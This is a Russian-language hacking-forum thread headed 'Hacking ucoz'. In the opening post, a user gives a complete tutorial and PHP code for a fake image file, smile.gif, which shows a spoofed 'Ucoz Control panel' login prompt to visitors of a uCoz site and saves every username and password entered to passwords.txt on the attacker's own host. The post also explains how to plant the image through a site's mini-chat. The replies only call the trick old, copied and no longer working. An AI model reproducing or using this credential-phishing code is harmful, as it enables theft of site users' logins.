Взлом ucoz

Discussion in 'Песочница' started by Pimkach, 19 Jan 2017.

  1. Pimkach

    Pimkach New Member

    Joined:
    18 Jan 2017
    Messages:
    2
    Likes Received:
    2
    Reputations:
    0
    Итак, начнем...
    Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif).
    Затем откройте блокнот, да простой блокнот и напишите следующее:
    <?
    header("Content-type: image/gif");
    $image = imagecreatefromgif('cool.gif');
    if(!$_COOKIE['LOGON'])
    {
    $login = $_SERVER['PHP_AUTH_USER'];
    $pass = $_SERVER['PHP_AUTH_PW'];
    if(strlen($pass) <= 4 || !$login)
    {
    Header('HTTP/1.1 401 Unauthorized');
    Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
    }
    elseif($login)
    {
    setcookie('LOGON',md5($pass));
    $f = fopen('passwords.txt', 'ab');
    fwrite($f, $login." ||| ".$pass."\r\n");
    fclose($f);
    }
    }
    imagegif($image);
    imagedestroy($image);
    ?>
    Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
    Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:
    http://mysite.phphost.net/smile.gif
    И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.
    Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим.
     
  2. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Это старый способ и негодный + копипаст,имхо ты спиздил с хакзоны)
     
    CyberTro1n likes this.
  3. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    529
    Likes Received:
    497
    Reputations:
    154
    Чувак ты в каком веке застрял?! Мне лет 12 было когда нашли эту хсску.
     
    _________________________
    CyberTro1n likes this.
  4. CyberTro1n

    CyberTro1n Well-Known Member

    Joined:
    20 Feb 2016
    Messages:
    545
    Likes Received:
    351
    Reputations:
    1
    :Dыыы))) как он рад)))
     
  5. Zorro12

    Zorro12 New Member

    Joined:
    24 Jan 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Она уже не работает
     
Loading...